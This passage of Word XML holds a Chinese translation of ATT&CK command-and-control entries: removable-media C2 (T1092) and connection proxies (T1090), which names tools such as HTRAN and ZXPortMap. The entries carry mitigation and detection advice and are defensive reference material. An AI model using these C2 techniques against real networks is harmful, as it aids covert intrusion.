            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>配置内部和外部防火墙来阻止与</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网络协议相关但非</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>特定</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>网段必</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>需</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>的</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>通用</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>端口上的流量。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="6B09AC83" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00724D59">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D2C0942" w14:textId="77777777" w:rsidR="00724D59" w:rsidRPr="00A65911" w:rsidRDefault="00724D59" w:rsidP="00724D59">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECCED3D" w14:textId="45A428CC" w:rsidR="00724D59" w:rsidRPr="00724D59" w:rsidRDefault="00724D59" w:rsidP="0038171C">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析网络数据中不常见的数据流（例如，客户端发送的数据明显多于从服务器接收的数据）。如果以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>不和网络通信的进程</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>使用了网络，或者</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>出现了</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>以前</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从未</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>见过的进程，则是可疑的。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析数据包内容来检测未遵循所使用端口的预期协议而</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>进行</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的通信。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F177F3" w14:textId="550E466E" w:rsidR="00A0413E" w:rsidRDefault="0038171C" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>经由可移动媒体</w:t>
      </w:r>
      <w:r w:rsidR="00A0413E" w:rsidRPr="00AB378F">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通信</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w14:paraId="47526333" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9736" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4593730E" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FB3DF0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB3DF0">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB3DF0">
              <w:t xml:space="preserve"> T1092</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44B1A864" w14:textId="37251208" w:rsidR="00A0413E" w:rsidRPr="00FB3DF0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>技术</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB3DF0">
              <w:t>：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB3DF0">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6E95E907" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FB3DF0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB3DF0">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB3DF0">
              <w:t xml:space="preserve"> Linux, macOS, Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0819B68B" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FB3DF0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB3DF0">
              <w:t>数据源：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB3DF0">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>文件监控</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB3DF0">
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidRPr="000C7856">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>数据泄漏防护</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5D7CB5DB" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00FB3DF0" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r>
              <w:t>是否需要网络：否</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="145977B7" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A57289" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00FB3DF0">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00FB3DF0">
              <w:t xml:space="preserve"> 1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3EB46C73" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A97E6B" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AB15836" w14:textId="19A55AC6" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可以使用可移动媒体在断开的网络上的受感染主机之间执行</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，以将命令从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统传输到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>另一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>系统。互联网连接系统可能首先受到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>感染</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，第二个系统则通过“通过可移动媒体复制”进行横向移动</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这两个系统都</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>会被感染</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令和文件将从断开连接的系统中继到</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者</w:t>
      </w:r>
      <w:r w:rsidRPr="00141A2E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可直接访问的因特网连接系统。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7091E0B0" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A57289" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r>
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2689"/>
        <w:gridCol w:w="7047"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w14:paraId="6CFB6B08" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="383"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="2765AE4F" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="02DCD59C" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="002D6F5B" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:rFonts w:eastAsia="Times New Roman"/>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="002D6F5B">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
                <w:shd w:val="clear" w:color="auto" w:fill="F3F3F3"/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00A57289" w14:paraId="07226245" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="540"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0445F5F1" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A57289" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A57289">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>禁用功能或删除程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AF8D57A" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A57289" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A57289">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果没有必要，请禁用</w:t>
            </w:r>
            <w:r w:rsidRPr="00A57289">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>Autoruns</w:t>
            </w:r>
            <w:r w:rsidRPr="00A57289">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00A0413E" w:rsidRPr="00A57289" w14:paraId="4F3F4A63" w14:textId="77777777" w:rsidTr="00F815A5">
        <w:trPr>
          <w:trHeight w:val="465"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2689" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4D20A657" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A57289" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A57289">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>操作系统配置</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7047" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="789A3710" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00A57289" w:rsidRDefault="00A0413E" w:rsidP="00F815A5">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A57289">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>如果业务操作不需要可移动媒体，则在组织策略级别上禁止或限制可移动媒体。</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A158F42" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRPr="00141A2E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="afd"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:color w:val="39434C"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3825A1E8" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>检测</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16C10D56" w14:textId="77777777" w:rsidR="00A0413E" w:rsidRDefault="00A0413E" w:rsidP="00A0413E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>监视可移动媒体上的文件访问。</w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F47217">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>检测安装可移动介质时执行的进程。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC740A4" w14:textId="63CB1A38" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="00A0413E" w:rsidP="0038171C">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="312"/>
        <w:rPr>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>连接代理</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="1560" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8176"/>
      </w:tblGrid>
      <w:tr w:rsidR="0038171C" w:rsidRPr="00A65911" w14:paraId="6EB13472" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8176" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53078AF3" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>编号：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>T1090</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="636A6F08" w14:textId="219580CC" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术：</w:t>
            </w:r>
            <w:r w:rsidR="00F743F9">
              <w:t>命令与控制</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="05326F2F" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>平台：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Linux</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>macOS</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7AE0196A" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>数据源：网络进程使用，进程监控，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Netflow/Enclave</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>技术网络流分析，</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
              </w:rPr>
              <w:t>网络抓包</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="023BF252" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>是否需要网络：是</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="50CBDC2D" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>贡献者：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>Walker Johnson</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="37CA8085" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00D6184F">
            <w:pPr>
              <w:pStyle w:val="TableText"/>
            </w:pPr>
            <w:r w:rsidRPr="00A65911">
              <w:t>版本：</w:t>
            </w:r>
            <w:r w:rsidRPr="00A65911">
              <w:t>1.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1F35FA38" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="0038171C">
      <w:pPr>
        <w:pStyle w:val="11"/>
        <w:ind w:left="1560"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74CCF31C" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00360523">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>连接代理用于在系统之间引导网络流量或充当网络通信的中介。存在多种启用了代理或端口模式</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:t>流量重定向</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的工具，包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HTRAN</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ZXProxy</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ZXPortMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75975EEC" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00360523">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代理的定义也可以扩展到涵盖对等网络、网状网络之间的信任关系，或由定期相互通信的主机或系统组成的网络之间的信任连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B217759" w14:textId="27CC3132" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="00360523">
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>网络可以在单个组织内，也可以在有信任关系的组织之间。</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>攻击者可能会基于这些类型的关系来管理</w:t>
      </w:r>
      <w:r w:rsidR="00F743F9">
        <w:t>命令与控制</w:t>
      </w:r>
      <w:r w:rsidRPr="00A65911">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>通信，从而减少同时进行的出站网络连接的数量，在连接丢失时提供弹性，或者跳过攻击对象之间现有的可信通信路径来避免嫌疑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DEC75A9" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00A65911" w:rsidRDefault="0038171C" w:rsidP="0038171C">
      <w:pPr>
        <w:pStyle w:val="BlockLabel"/>
      </w:pPr>
      <w:r w:rsidRPr="00A65911">
        <w:t>缓解</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="af3"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="2547"/>
        <w:gridCol w:w="7189"/>
      </w:tblGrid>
      <w:tr w:rsidR="0038171C" w:rsidRPr="00360523" w14:paraId="12858FDA" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="353"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="536AB68D" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00360523" w:rsidRDefault="0038171C" w:rsidP="00360523">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00360523">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>缓解措施</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7189" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="E7E6E6" w:themeFill="background2"/>
          </w:tcPr>
          <w:p w14:paraId="3FEA171D" w14:textId="77777777" w:rsidR="0038171C" w:rsidRPr="00360523" w:rsidRDefault="0038171C" w:rsidP="00360523">
            <w:pPr>
              <w:pStyle w:val="TableHeading"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00360523">
              <w:rPr>
                <w:rFonts w:hint="eastAsia"/>
                <w:b/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0038171C" w:rsidRPr="00A65911" w14:paraId="7C32552A" w14:textId="77777777" w:rsidTr="00D6184F">
        <w:trPr>
          <w:trHeight w:val="1276"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2547" w:type="dxa"/>
          </w:tcPr>
